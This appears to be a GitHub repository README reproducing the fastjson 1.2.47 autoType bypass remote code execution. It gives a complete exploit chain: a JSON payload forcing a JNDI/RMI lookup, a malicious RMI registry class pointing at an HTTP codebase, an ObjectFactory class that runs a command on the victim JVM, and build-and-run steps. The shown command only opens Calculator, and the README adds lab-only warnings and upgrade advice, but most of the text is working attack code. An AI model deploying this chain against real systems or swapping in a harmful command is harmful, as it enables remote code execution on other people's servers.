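├── Fastjson.jpg
└── README.md

/Fastjson.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/fastjson-RCE/HEAD/Fastjson.jpg

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# fastjson-v1.2.47-RCE 漏洞复现 (vulnerability reproduction)

## 受影响版本 (affected): fastjson <= 1.2.47

> Lab use only. Run this against a host and JVM you control: `rmiServer` and the
> HTTP server below hand out a class that executes a command on whichever machine
> parses the payload. Fixed in fastjson 1.2.48; upgrade, and on 1.2.68+ enable
> `safeMode` so `@type` is not honoured at all.

### 资源下载 (downloads)

```
下载 http://repo1.maven.org/maven2/com/alibaba/fastjson/1.2.47/
文档 https://github.com/alibaba/fastjson/wiki/%E5%B8%B8%E8%A7%81%E9%97%AE%E9%A2%98
源码 https://github.com/alibaba/fastjson/archive/1.2.47.zip

jar http://repo1.maven.org/maven2/com/alibaba/fastjson/1.2.47/fastjson-1.2.47.jar
Java SE Development Kit 8u60
https://download.oracle.com/otn/java/jdk/8u60-b27/jdk-8u60-windows-x64.exe
```

Fetch the jar over HTTPS and compare it with the checksum published on Maven
Central before putting it on a classpath. The JDK is pinned to 8u60 on purpose:
later JDK 8 updates stop the JNDI/RMI client from loading a factory class from a
remote codebase by default (`com.sun.jndi.rmi.object.trustURLCodebase=false`),
so on a newer JDK the lookup still happens but `Exploit` is never fetched or run.

![](./Fastjson.jpg)

## poc.java

Payload (one JSON document, shown on one line):

```json
{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"xxxx":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}}
```

* `name` goes through fastjson's `java.lang.Class` handler, whose `val` names a
  class to load; this loads `com.sun.rowset.JdbcRowSetImpl` before any `@type`
  check is applied to that name.
* `xxxx` then names `com.sun.rowset.JdbcRowSetImpl` as `@type` directly. In
  1.2.47 the class loaded in the previous step is already in the parser's class
  cache, which the autoType check consulted before its deny-list, so the type is
  accepted.
* `dataSourceName` is set to an RMI URL and then `autoCommit` is set;
  `JdbcRowSetImpl.setAutoCommit` connects to the data source, which is a JNDI
  lookup of that URL, and the resolved `Reference` makes the JVM load the factory
  class from the RMI server's codebase.

The payload as originally published carried one extra closing `}`; it is dropped
here so the document is valid JSON. The lookup fires while the `xxxx` object is
being deserialized, before the parser reaches the end of the document.

Compile and run with the fastjson jar on the classpath:

`javac -cp fastjson-1.2.47.jar poc.java`

`java -cp fastjson-1.2.47.jar:. poc`

```java
import com.alibaba.fastjson.JSON;

/**
 * Parses the autoType bypass payload with fastjson. Nothing else is needed: the
 * JNDI lookup is triggered by the autoCommit setter while the "xxxx" object is
 * being deserialized, so the parse result is never used.
 */
public class poc {

    public static void main(String[] argv) {
        // "name" preloads JdbcRowSetImpl through the java.lang.Class handler;
        // "xxxx" then instantiates it and points dataSourceName at rmiServer.
        String payload = "{\"name\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},"
                + "\"xxxx\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":"
                + "\"rmi://localhost:1099/Exploit\",\"autoCommit\":true}}";
        JSON.parse(payload);
    }

}
```

## rmiServer.java

Start the HTTP server from the directory that contains `Exploit.class` (and
nothing else you do not want served), then the registry, then run `poc`:

`javac rmiServer.java`

`java rmiServer`

`python -m SimpleHTTPServer` (Python 2; on Python 3 use `python3 -m http.server`)

```java
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

/**
 * Malicious RMI registry. Binds the name "Exploit" to a JNDI Reference whose
 * factory class is fetched from http://localhost:8000/, i.e. the HTTP server
 * started above in the directory holding Exploit.class.
 */
public class rmiServer {

    public static void main(String[] args) throws Exception {
        Registry registry = LocateRegistry.createRegistry(1099);
        // Reference(className, factoryClassName, factoryLocation): the factory
        // is the class the victim actually loads and instantiates. The original
        // write-up spelled className "Exloit"; that argument is only a label,
        // so the typo was harmless, but both are "Exploit" here for clarity.
        Reference reference = new Reference("Exploit",
                "Exploit", "http://localhost:8000/");
        ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
        registry.bind("Exploit", referenceWrapper);
        // The exported registry keeps the JVM running; stop it with Ctrl-C.
    }
}
```

## Exploit.java

`javac Exploit.java`

```java
import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.io.IOException;
import java.util.Hashtable;

/**
 * Object factory fetched and instantiated by the victim JVM during the JNDI
 * lookup. getObjectInstance runs the command; the object it returns is never
 * used by the PoC.
 */
public class Exploit implements ObjectFactory {

    /**
     * Command executed on the victim: the macOS Calculator, as in the original
     * write-up. Replace with a benign equivalent for your lab (e.g. "xterm" on
     * Linux); the original passed "xterm" and "123" to exec but ignored them.
     */
    private static final String COMMAND = "/Applications/Calculator.app/Contents/MacOS/Calculator";

    @Override
    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) {
        exec(COMMAND);
        return null;
    }

    /**
     * Starts {@code cmd} as a single executable with no arguments. Returns ""
     * so the original signature is kept; failures are only printed because this
     * runs inside the victim's JNDI lookup with no logger of its own.
     */
    public static String exec(String cmd) {
        try {
            new ProcessBuilder(cmd).start();
        } catch (IOException e) {
            e.printStackTrace();
        }
        return "";
    }

    /** Local sanity check: run the command directly before serving the class. */
    public static void main(String[] args) {
        exec(COMMAND);
    }
}
```

## 参考链接 (references)

https://www.03sec.com/3240.shtml


--------------------------------------------------------------------------------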